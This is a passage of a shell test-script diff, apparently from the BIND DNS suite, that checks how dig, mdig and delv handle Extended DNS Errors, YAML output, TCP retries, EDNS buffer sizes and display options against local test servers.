+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that Extended DNS Error 25 is printed correctly ($n)"
+ # First undefined EDE code, additional text "foo".
+ dig_with_opts @10.53.0.3 +ednsopt=ede:0019666f6f a.example +qr > dig.out.test$n 2>&1 || ret=1
+ pat='^; EDE: 25: (foo)$'
+ tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that invalid Extended DNS Error (length 0) is printed ($n)"
+ # EDE payload is too short
+ dig_with_opts @10.53.0.3 +ednsopt=ede a.example +qr > dig.out.test$n 2>&1 || ret=1
+ pat='^; EDE:$'
+ tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that invalid Extended DNS Error (length 1) is printed ($n)"
+ # EDE payload is too short
+ dig_with_opts @10.53.0.3 +ednsopt=ede:00 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ pat='^; EDE: 00 (".")$'
+ tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ if [ $HAS_PYYAML -ne 0 ] ; then
+ n=$((n+1))
+ echo_i "check that +yaml Extended 
DNS Error 0 is printed correctly ($n)"
+ # First defined EDE code, additional text "foo".
+ dig_with_opts @10.53.0.3 +yaml +ednsopt=ede:0000666f6f a.example +qr > dig.out.test$n 2>&1 || ret=1
+ $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE INFO-CODE > yamlget.out.test$n 2>&1 || ret=1
+ read -r value < yamlget.out.test$n
+ [ "$value" = "0 (Other)" ] || ret=1
+ $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE EXTRA-TEXT > yamlget.out.test$n 2>&1 || ret=1
+ read -r value < yamlget.out.test$n
+ [ "$value" = "foo" ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that +yaml Extended DNS Error 24 is printed correctly ($n)"
+ # Last defined EDE code, no additional text.
+ dig_with_opts @10.53.0.3 +yaml +ednsopt=ede:0018 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE INFO-CODE > yamlget.out.test$n 2>&1 || ret=1
+ read -r value < yamlget.out.test$n
+ [ "$value" = "24 (Invalid Data)" ] || ret=1
+ $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE EXTRA-TEXT > yamlget.out.test$n 2>&1 && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that +yaml Extended DNS Error 25 is printed correctly ($n)"
+ # First undefined EDE code, additional text "foo". 
+ dig_with_opts @10.53.0.3 +yaml +ednsopt=ede:0019666f6f a.example +qr > dig.out.test$n 2>&1 || ret=1
+ $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE INFO-CODE > yamlget.out.test$n 2>&1 || ret=1
+ read -r value < yamlget.out.test$n
+ [ "$value" = "25" ] || ret=1
+ $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE EXTRA-TEXT > yamlget.out.test$n 2>&1 || ret=1
+ read -r value < yamlget.out.test$n
+ [ "$value" = "foo" ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that invalid Extended DNS Error (length 0) is printed ($n)"
+ # EDE payload is too short
+ dig_with_opts @10.53.0.3 +yaml +ednsopt=ede a.example +qr > dig.out.test$n 2>&1 || ret=1
+ $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE > yamlget.out.test$n 2>&1 || ret=1
+ read -r value < yamlget.out.test$n
+ [ "$value" = "None" ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that invalid +yaml Extended DNS Error (length 1) is printed ($n)"
+ # EDE payload is too short
+ dig_with_opts @10.53.0.3 +yaml +ednsopt=ede:00 a.example +qr > dig.out.test$n 2>&1 || ret=1
+ $PYTHON yamlget.py dig.out.test$n 0 message query_message_data OPT_PSEUDOSECTION EDNS EDE > yamlget.out.test$n 2>&1 || ret=1
+ read -r value < yamlget.out.test$n
+ [ "$value" = '00 (".")' ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ fi
+
+ n=$((n+1))
+ echo_i "check that dig handles malformed option '+ednsopt=:' gracefully ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +ednsopt=: a.example > dig.out.test$n 2>&1 && ret=1
+ grep "ednsopt no code point specified" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig gracefully handles bad escape in domain name ($n)"
+ ret=0
+ 
digstatus=0
+ dig_with_opts @10.53.0.3 '\0.' > dig.out.test$n 2>&1 || digstatus=$?
+ echo digstatus=$digstatus >> dig.out.test$n
+ test $digstatus -eq 10 || ret=1
+ grep REQUIRE dig.out.test$n > /dev/null && ret=1
+ grep "is not a legal name (bad escape)" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig -q -m works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 -q -m > dig.out.test$n 2>&1
+ pat='^;-m\..*IN.*A$'
+ tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1
+ grep "Dump of all outstanding memory allocations" dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking exit code for a retry upon TCP EOF (immediate -> immediate) ($n)"
+ ret=0
+ echo "no_response no_response" | sendcmd 10.53.0.5
+ dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 && ret=1
+ # Sanity check: ensure ans5 behaves as expected.
+ [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 2 ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking exit code for a retry upon TCP EOF (partial AXFR -> partial AXFR) ($n)"
+ ret=0
+ echo "partial_axfr partial_axfr" | sendcmd 10.53.0.5
+ dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 && ret=1
+ # Sanity check: ensure ans5 behaves as expected.
+ [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 2 ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking exit code for a retry upon TCP EOF (immediate -> partial AXFR) ($n)"
+ ret=0
+ echo "no_response partial_axfr" | sendcmd 10.53.0.5
+ dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 && ret=1
+ # Sanity check: ensure ans5 behaves as expected. 
+ [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 2 ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking exit code for a retry upon TCP EOF (partial AXFR -> immediate) ($n)"
+ ret=0
+ echo "partial_axfr no_response" | sendcmd 10.53.0.5
+ dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 && ret=1
+ # Sanity check: ensure ans5 behaves as expected.
+ [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 2 ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking exit code for a retry upon TCP EOF (immediate -> complete AXFR) ($n)"
+ ret=0
+ echo "no_response complete_axfr" | sendcmd 10.53.0.5
+ dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 || ret=1
+ # Sanity check: ensure ans5 behaves as expected.
+ [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 1 ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking exit code for a retry upon TCP EOF (partial AXFR -> complete AXFR) ($n)"
+ ret=0
+ echo "partial_axfr complete_axfr" | sendcmd 10.53.0.5
+ dig_with_opts @10.53.0.5 example AXFR +tries=2 > dig.out.test$n 2>&1 || ret=1
+ # Sanity check: ensure ans5 behaves as expected.
+ [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 1 ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking +tries=1 won't retry twice upon TCP EOF ($n)"
+ ret=0
+ echo "no_response no_response" | sendcmd 10.53.0.5
+ dig_with_opts @10.53.0.5 example AXFR +tries=1 > dig.out.test$n 2>&1 && ret=1
+ # Sanity check: ensure ans5 behaves as expected. 
+ [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 1 ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking +retry=0 won't retry twice upon TCP EOF ($n)"
+ ret=0
+ dig_with_opts @10.53.0.5 example AXFR +retry=0 > dig.out.test$n 2>&1 && ret=1
+ # Sanity check: ensure ans5 behaves as expected.
+ [ `grep "communications error.*end of file" dig.out.test$n | wc -l` -eq 1 ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig +expandaaaa works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +expandaaaa AAAA ns2.example > dig.out.test$n 2>&1 || ret=1
+ grep "ns2.example.*fd92:7065:0b8e:ffff:0000:0000:0000:0002" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig +noexpandaaaa works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +noexpandaaaa AAAA ns2.example > dig.out.test$n 2>&1 || ret=1
+ grep "ns2.example.*fd92:7065:b8e:ffff::2" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig default for +[no]expandaaa (+noexpandaaaa) works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 AAAA ns2.example > dig.out.test$n 2>&1 || ret=1
+ grep "ns2.example.*fd92:7065:b8e:ffff::2" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+
+ echo_i "check that dig +short +expandaaaa works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 +short +expandaaaa AAAA ns2.example > dig.out.test$n 2>&1 || ret=1
+ pat='^fd92:7065:0b8e:ffff:0000:0000:0000:0002$'
+ tr -d '\r' < dig.out.test$n | grep "$pat" > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ if [ $HAS_PYYAML -ne 0 ] ; then
+ n=$((n+1))
+ echo_i "check dig +yaml output ($n)"
+ ret=0
+ dig_with_opts +qr +yaml @10.53.0.3 
any ns2.example > dig.out.test$n 2>&1 || ret=1
+ value=$($PYTHON yamlget.py dig.out.test$n 0 message query_message_data status || ret=1)
+ [ "$value" = "NOERROR" ] || ret=1
+ value=$($PYTHON yamlget.py dig.out.test$n 1 message response_message_data status || ret=1)
+ [ "$value" = "NOERROR" ] || ret=1
+ value=$($PYTHON yamlget.py dig.out.test$n 1 message response_message_data QUESTION_SECTION 0 || ret=1)
+ [ "$value" = "ns2.example. IN ANY" ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check dig +yaml output of an IPv6 address ending in zeroes ($n)"
+ ret=0
+ dig_with_opts +qr +yaml @10.53.0.3 aaaa d.example > dig.out.test$n 2>&1 || ret=1
+ $PYTHON yamlget.py dig.out.test$n 1 message response_message_data ANSWER_SECTION 0 > yamlget.out.test$n 2>&1 || ret=1
+ read -r value < yamlget.out.test$n
+ [ "$value" = "d.example. 300 IN AAAA fd92:7065:b8e:ffff::0" ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ fi
+
+ n=$((n+1))
+ echo_i "check that dig +unexpected works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.6 +unexpected a a.example > dig.out.test$n || ret=1
+ grep 'reply from unexpected source' dig.out.test$n > /dev/null || ret=1
+ grep 'status: NOERROR' dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig +nounexpected works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.6 +nounexpected +tries=1 +time=2 a a.example > dig.out.test$n && ret=1
+ grep 'reply from unexpected source' dig.out.test$n > /dev/null || ret=1
+ grep "status: NOERROR" < dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig default for +[no]unexpected (+nounexpected) works ($n)"
+ ret=0
+ dig_with_opts @10.53.0.6 +tries=1 +time=2 a a.example > dig.out.test$n && ret=1
+ grep 'reply from unexpected source' dig.out.test$n > /dev/null || 
ret=1
+ grep "status: NOERROR" < dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig +bufsize=0 disables EDNS ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 a.example +bufsize=0 +qr > dig.out.test$n 2>&1 || ret=1
+ grep "EDNS:" dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig +bufsize=0 +edns sends EDNS with bufsize of 0 ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 a.example +bufsize=0 +edns +qr > dig.out.test$n 2>&1 || ret=1
+ pat='EDNS:.* udp: 0$'
+ tr -d '\r' < dig.out.test$n | grep -E "$pat" > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig +bufsize restores default bufsize ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 a.example +bufsize=0 +bufsize +qr > dig.out.test$n 2>&1 || ret=1
+ lines1232=`grep "EDNS:.* udp: 1232" dig.out.test$n | wc -l`
+ lines4096=`grep "EDNS:.* udp: 4096" dig.out.test$n | wc -l`
+ test $lines1232 -eq 1 || ret=1
+ test $lines4096 -eq 1 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig without -u displays 'Query time' in millseconds ($n)"
+ ret=0
+ dig_with_opts @10.53.0.3 a.example > dig.out.test$n 2>&1 || ret=1
+ grep ';; Query time: [0-9][0-9]* msec' dig.out.test$n >/dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig -u displays 'Query time' in microseconds ($n)"
+ ret=0
+ dig_with_opts -u @10.53.0.3 a.example > dig.out.test$n 2>&1 || ret=1
+ grep ';; Query time: [0-9][0-9]* usec' dig.out.test$n >/dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig +yaml without -u displays timestamps in milliseconds ($n)"
+ ret=0
+ dig_with_opts +yaml @10.53.0.3 a.example > 
dig.out.test$n 2>&1 || ret=1
+ grep 'query_time: !!timestamp ....-..-..T..:..:..\....Z' dig.out.test$n >/dev/null || ret=1
+ grep 'response_time: !!timestamp ....-..-..T..:..:..\....Z' dig.out.test$n >/dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "check that dig -u +yaml displays timestamps in microseconds ($n)"
+ ret=0
+ dig_with_opts -u +yaml @10.53.0.3 a.example > dig.out.test$n 2>&1 || ret=1
+ grep 'query_time: !!timestamp ....-..-..T..:..:..\.......Z' dig.out.test$n >/dev/null || ret=1
+ grep 'response_time: !!timestamp ....-..-..T..:..:..\.......Z' dig.out.test$n >/dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+else
+ echo_i "$DIG is needed, so skipping these dig tests"
+fi
+
+if [ -x "$MDIG" ] ; then
+ n=$((n+1))
+ echo_i "check that mdig handles malformed option '+ednsopt=:' gracefully ($n)"
+ ret=0
+ mdig_with_opts @10.53.0.3 +ednsopt=: a.example > dig.out.test$n 2>&1 && ret=1
+ grep "ednsopt no code point specified" dig.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking mdig +multi +norrcomments works for DNSKEY (when default is rrcomments)($n)"
+ ret=0
+ mdig_with_opts +tcp @10.53.0.3 +multi +norrcomments -t DNSKEY example > dig.out.test$n || ret=1
+ grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" dig.out.test$n && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking mdig +multi +norrcomments works for SOA (when default is rrcomments)($n)"
+ ret=0
+ mdig_with_opts +tcp @10.53.0.3 +multi +norrcomments -t SOA example > dig.out.test$n || ret=1
+ grep "; serial" < dig.out.test$n > /dev/null && ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ if [ $HAS_PYYAML -ne 0 ] ; then
+ n=$((n+1))
+ echo_i "check mdig +yaml output ($n)"
+ ret=0
+ mdig_with_opts +yaml @10.53.0.3 
-t any ns2.example > dig.out.test$n || ret=1
+ value=$($PYTHON yamlget.py dig.out.test$n 0 message response_message_data status || ret=1)
+ [ "$value" = "NOERROR" ] || ret=1
+ value=$($PYTHON yamlget.py dig.out.test$n 0 message response_message_data QUESTION_SECTION 0 || ret=1)
+ [ "$value" = "ns2.example. IN ANY" ] || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ fi
+else
+ echo_i "$MDIG is needed, so skipping these mdig tests"
+fi
+
+if [ -x "$DELV" ] ; then
+ n=$((n+1))
+ echo_i "checking delv short form works ($n)"
+ ret=0
+ delv_with_opts @10.53.0.3 +short a a.example > delv.out.test$n || ret=1
+ test "$(wc -l < delv.out.test$n)" -eq 1 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking delv split width works ($n)"
+ ret=0
+ delv_with_opts @10.53.0.3 +split=4 -t sshfp foo.example > delv.out.test$n || ret=1
+ grep " 9ABC DEF6 7890 " < delv.out.test$n > /dev/null || ret=1
+ check_ttl_range delv.out.test$n "SSHFP" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking delv +unknownformat works ($n)"
+ ret=0
+ delv_with_opts @10.53.0.3 +unknownformat a a.example > delv.out.test$n || ret=1
+ grep "CLASS1[ ][ ]*TYPE1[ ][ ]*\\\\# 4 0A000001" < delv.out.test$n > /dev/null || ret=1
+ check_ttl_range delv.out.test$n "TYPE1" 300 || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking delv -4 -6 ($n)"
+ ret=0
+ delv_with_opts @10.53.0.3 -4 -6 A a.example > delv.out.test$n 2>&1 && ret=1
+ grep "only one of -4 and -6 allowed" < delv.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+
+ n=$((n+1))
+ echo_i "checking delv with IPv6 on IPv4 does not work ($n)"
+ if testsock6 fd92:7065:b8e:ffff::3 2>/dev/null
+ then
+ ret=0
+ # following should fail because @IPv4 overrides earlier @IPv6 above
+ # and -6 forces 
IPv6 so this should fail, with a message
+ # "Use of IPv4 disabled by -6"
+ delv_with_opts @fd92:7065:b8e:ffff::3 @10.53.0.3 -6 -t txt foo.example > delv.out.test$n 2>&1 && ret=1
+ # it should have no results but error output
+ grep "testing" < delv.out.test$n > /dev/null && ret=1
+ grep "Use of IPv4 disabled by -6" delv.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ else
+ echo_i "IPv6 unavailable; skipping"
+ fi
+
+ n=$((n+1))
+ echo_i "checking delv with IPv4 on IPv6 does not work ($n)"
+ if testsock6 fd92:7065:b8e:ffff::3 2>/dev/null
+ then
+ ret=0
+ # following should fail because @IPv6 overrides earlier @IPv4 above
+ # and -4 forces IPv4 so this should fail, with a message
+ # "Use of IPv6 disabled by -4"
+ delv_with_opts @10.53.0.3 @fd92:7065:b8e:ffff::3 -4 -t txt foo.example > delv.out.test$n 2>&1 && ret=1
+ # it should have no results but error output
+ grep "testing" delv.out.test$n > /dev/null && ret=1
+ grep "Use of IPv6 disabled by -4" delv.out.test$n > /dev/null || ret=1
+ if [ $ret -ne 0 ]; then echo_i "failed"; fi
+ status=$((status+ret))
+ else
+ echo_i "IPv6 unavailable; skipping"
+ fi
+
+ n=$((n+1))
+ echo_i "checking delv with reverse lookup works ($n)"
+ ret=0
+ delv_with_opts @10.53.0.3 -x 127.0.0.1 > delv.out.test$n 2>&1 || ret=1
+ # doesn't matter if has answer
+ grep -i "127\\.in-addr\\.arpa\\." 
< delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n '\\-ANY' 10800 3 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv over TCP works ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 a a.example > delv.out.test$n || ret=1 + grep "10\\.0\\.0\\.1$" < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +multi +norrcomments works for DNSKEY (when default is rrcomments)($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +multi +norrcomments DNSKEY example > delv.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n > /dev/null && ret=1 + check_ttl_range delv.out.test$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +multi +norrcomments works for SOA (when default is rrcomments)($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +multi +norrcomments SOA example > delv.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n > /dev/null && ret=1 + check_ttl_range delv.out.test$n "SOA" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +rrcomments works for DNSKEY($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +rrcomments DNSKEY example > delv.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "DNSKEY" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +short +rrcomments works for DNSKEY ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > delv.out.test$n || ret=1 + grep "; ZSK; alg = $DEFAULT_ALGORITHM ; key id = 
$KEYID" < delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +short +rrcomments works ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +short +rrcomments DNSKEY example > delv.out.test$n || ret=1 + grep -q "$KEYDATA ; ZSK; alg = $DEFAULT_ALGORITHM ; key id = $KEYID" < delv.out.test$n || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +short +nosplit works ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +short +nosplit DNSKEY example > delv.out.test$n || ret=1 + grep -q "$NOSPLIT" < delv.out.test$n || ret=1 + test "$(wc -l < delv.out.test$n)" -eq 1 || ret=1 + test "$(awk '{print NF}' < delv.out.test$n)" -eq 14 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +short +nosplit +norrcomments works ($n)" + ret=0 + delv_with_opts +tcp @10.53.0.3 +short +nosplit +norrcomments DNSKEY example > delv.out.test$n || ret=1 + grep -q "$NOSPLIT\$" < delv.out.test$n || ret=1 + test "$(wc -l < delv.out.test$n)" -eq 1 || ret=1 + test "$(awk '{print NF}' < delv.out.test$n)" -eq 4 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +sp works as an abbriviated form of split ($n)" + ret=0 + delv_with_opts @10.53.0.3 +sp=4 -t sshfp foo.example > delv.out.test$n || ret=1 + grep " 9ABC DEF6 7890 " < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "SSHFP" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv +sh works as an abbriviated form of short ($n)" + ret=0 + delv_with_opts @10.53.0.3 +sh a a.example > delv.out.test$n || ret=1 + test "$(wc -l < delv.out.test$n)" -eq 1 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv -c IN works ($n)" 
+ ret=0 + delv_with_opts @10.53.0.3 -c IN -t a a.example > delv.out.test$n || ret=1 + grep "a.example." < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv -c CH is ignored, and treated like IN ($n)" + ret=0 + delv_with_opts @10.53.0.3 -c CH -t a a.example > delv.out.test$n || ret=1 + grep "a.example." < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "checking delv H is ignored, and treated like IN ($n)" + ret=0 + delv_with_opts @10.53.0.3 -c CH -t a a.example > delv.out.test$n || ret=1 + grep "a.example." < delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n "A" 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that delv -q -m works ($n)" + ret=0 + delv_with_opts @10.53.0.3 -q -m > delv.out.test$n 2>&1 || ret=1 + grep '^; -m\..*[0-9]*.*IN.*ANY.*;' delv.out.test$n > /dev/null || ret=1 + grep "^add " delv.out.test$n > /dev/null && ret=1 + grep "^del " delv.out.test$n > /dev/null && ret=1 + check_ttl_range delv.out.test$n '\\-ANY' 300 3 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that delv -t ANY works ($n)" + ret=0 + delv_with_opts @10.53.0.3 -t ANY example > delv.out.test$n 2>&1 || ret=1 + grep "^example." 
< delv.out.test$n > /dev/null || ret=1 + check_ttl_range delv.out.test$n NS 300 || ret=1 + check_ttl_range delv.out.test$n SOA 300 || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that delv loads key-style trust anchors ($n)" + ret=0 + delv_with_opts -a ns3/anchor.dnskey +root=example @10.53.0.3 -t DNSKEY example > delv.out.test$n 2>&1 || ret=1 + grep "fully validated" delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + n=$((n+1)) + echo_i "check that delv loads DS-style trust anchors ($n)" + ret=0 + delv_with_opts -a ns3/anchor.ds +root=example @10.53.0.3 -t DNSKEY example > delv.out.test$n 2>&1 || ret=1 + grep "fully validated" delv.out.test$n > /dev/null || ret=1 + if [ $ret -ne 0 ]; 